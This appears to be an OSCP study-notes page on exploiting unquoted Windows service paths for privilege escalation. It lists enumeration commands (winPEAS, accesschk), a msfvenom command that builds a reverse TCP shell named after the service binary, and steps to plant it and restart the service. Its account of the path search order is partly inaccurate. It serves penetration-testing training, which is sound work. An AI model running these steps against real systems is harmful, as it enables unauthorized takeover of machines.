Unquoted service paths
Unquoted service paths
A properly configured service path would look something like this:
"C:\Program Files (x86)\Common Files\Steam\SteamService.exe"You might, however, come across a misconfigured service path during your OSCP exam. An unquoted service path would look something like this:
C:\Program Files (x86)\Common Files\Steam\SteamService.exeThis can be a vulnerability because Windows looks for service executables in hierarchical order.
It would look for ‘SteamService.exe’ in the following order:
Program Files (x86)
Common Files
Steam
This means that you could add a maliscious file called ‘SteamService.exe’ to the ‘Common Files’ directory if you have write permissions.
All you’d have to do then is restart the service to execute your maliscious file.
But first, you need to run a few checks because:
you might not have directory write permissions
You might be unable to restart the service
The service might not be running as an elevated user
Check for unquoted service paths with winPEAS
winpeas.exeDo you have permissions to execute the service?
Download accesschk.exe to the target
accesschk.exe /accepteula -ucqv user <SERVICE>Do you have write permissions for any of the directories? (Check each directory)
accesschk.exe /accepteula -uwdq "C:\DIRECTORY\PATH"
Example:
accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\"
accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\Common Files\"
accesschk.exe /accepteula -uwdq "C:\Program Files (x86)\Common Files\Steam\"Let’s assume you have write permssions for the ‘Common Files ‘ directory.
Generate a reverse shell payload:
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > SteamService.exe # revere shell name should match the service .exe binaryDownload your payload to the target and copy into the writeable directory:
copy SteamService.exe "C:\Program Files (x86)\Common Files\SteamService.exe"Setup a listener in Metasploit and restart the service:
net stop <SERVICE>
net start <SERVICE>Last updated
Was this helpful?